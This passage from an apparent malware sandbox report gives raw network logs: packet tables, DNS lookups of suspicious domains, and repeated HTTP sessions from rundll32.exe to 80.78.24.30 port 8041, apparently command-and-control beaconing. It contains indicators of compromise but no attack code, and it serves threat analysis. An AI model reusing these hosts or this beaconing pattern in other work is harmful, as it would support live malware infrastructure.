                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.945506096 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.945511103 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396855116 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396960020 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396996021 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397388935 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397424936 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397439957 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491312027 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491403103 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491591930 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491888046 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491904974 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.959182024 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.959781885 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.960511923 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.960540056 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.963315010 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.963329077 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412214041 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412307024 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412303925 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412377119 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412571907 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412616014 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.602727890 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.602791071 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.602859974 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.603108883 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.603125095 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.082994938 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.083055019 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.083669901 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.083677053 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.085658073 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.085664034 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.534893990 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.534991980 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.535305977 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.535305977 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.653492928 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.653534889 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.653731108 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.654050112 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.654062033 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.917192936 CEST49789443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:56.917221069 CEST44349789188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.134186029 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.135415077 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.136887074 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.136887074 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.136909008 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.136923075 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.352148056 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.357264996 CEST80414979180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.357453108 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.357716084 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.362643957 CEST80414979180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.584944010 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.584994078 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585016012 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585035086 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585055113 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585082054 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585375071 CEST49790443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:57.585392952 CEST44349790188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.037760019 CEST80414979180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.037812948 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.038069963 CEST80414979180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.038110971 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.343642950 CEST497918041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.344048023 CEST497928041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.348665953 CEST80414979180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.349436998 CEST80414979280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.349590063 CEST497928041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.351161957 CEST497928041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.356443882 CEST80414979280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.609622955 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.609689951 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.610131979 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.610789061 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.610806942 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.992655993 CEST80414979280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.992963076 CEST80414979280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.993268013 CEST497928041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.993671894 CEST497928041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.993695974 CEST497948041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.999521017 CEST80414979280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.999537945 CEST80414979480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:58.999701023 CEST497948041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.001293898 CEST497948041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.006300926 CEST80414979480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.006373882 CEST497948041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.084500074 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.084667921 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.085048914 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.085082054 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.091315985 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.091331005 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.710037947 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.710100889 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.710187912 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.710419893 CEST49793443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.710459948 CEST44349793188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.844911098 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.844974995 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.845093012 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.845391035 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:59.845401049 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.072490931 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.077889919 CEST80414979680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.078008890 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.078417063 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.083462954 CEST80414979680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.323268890 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.323410034 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.325048923 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.325066090 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.325544119 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.325548887 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.703573942 CEST80414979680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.703758955 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.704462051 CEST80414979680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.704487085 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.704545975 CEST497968041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.704974890 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.710171938 CEST80414979680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.711498976 CEST80414979780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.711611986 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.712030888 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.717113018 CEST80414979780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.749663115 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.749735117 CEST44349795188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.749752045 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:00.749789000 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:01.349472046 CEST80414979780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:01.349562883 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:01.349977016 CEST80414979780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:01.350145102 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:02.347239971 CEST497978041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:47:02.352997065 CEST80414979780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:47:05.003791094 CEST49795443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:47:05.003818035 CEST44349795188.114.96.3192.168.2.9

                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Oct 3, 2024 20:45:10.034882069 CEST6484853192.168.2.91.1.1.1
                                                                                                                                                                                                                          Oct 3, 2024 20:45:10.048582077 CEST53648481.1.1.1192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:11.440717936 CEST5128353192.168.2.91.1.1.1
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.449753046 CEST5128353192.168.2.91.1.1.1
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.718703985 CEST53512831.1.1.1192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.724982023 CEST53512831.1.1.1192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:13.859194040 CEST6287453192.168.2.91.1.1.1
                                                                                                                                                                                                                          Oct 3, 2024 20:45:14.032295942 CEST53628741.1.1.1192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.933881044 CEST5255953192.168.2.91.1.1.1
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.126965046 CEST53525591.1.1.1192.168.2.9

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Oct 3, 2024 20:45:10.034882069 CEST192.168.2.91.1.1.10x5ffeStandard query (0)tiguanin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:11.440717936 CEST192.168.2.91.1.1.10x78b2Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.449753046 CEST192.168.2.91.1.1.10x78b2Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:13.859194040 CEST192.168.2.91.1.1.10x45b4Standard query (0)bazarunet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.933881044 CEST192.168.2.91.1.1.10xd6c1Standard query (0)isomicrotich.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Oct 3, 2024 20:45:10.048582077 CEST1.1.1.1192.168.2.90x5ffeNo error (0)tiguanin.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.718703985 CEST1.1.1.1192.168.2.90x78b2No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:12.724982023 CEST1.1.1.1192.168.2.90x78b2No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:45:14.032295942 CEST1.1.1.1192.168.2.90x45b4No error (0)bazarunet.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.126965046 CEST1.1.1.1192.168.2.90xd6c1No error (0)isomicrotich.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.126965046 CEST1.1.1.1192.168.2.90xd6c1No error (0)isomicrotich.com188.114.97.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • isomicrotich.com

                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.94971880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:10.733642101 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.94971980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:11.383349895 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.94972480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:14.683825970 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.94972580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:16.325100899 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request
                                                                                                                                                                                                                          Oct 3, 2024 20:45:16.325757980 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request
                                                                                                                                                                                                                          Oct 3, 2024 20:45:16.327436924 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.94973180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:35.495724916 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.94973280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:36.353638887 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.94973580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:44.004328012 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.94973680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:44.625129938 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          8192.168.2.94973880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.338917017 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          9192.168.2.94973980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.073749065 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          10192.168.2.94974380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.703495979 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          11192.168.2.94974480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.371779919 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          12192.168.2.94974680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128494024 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          13192.168.2.94974780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771469116 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          14192.168.2.94975080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.503974915 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                          Data Ascii: 400 Bad Request


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          15192.168.2.94975180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133115053 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Connection: close
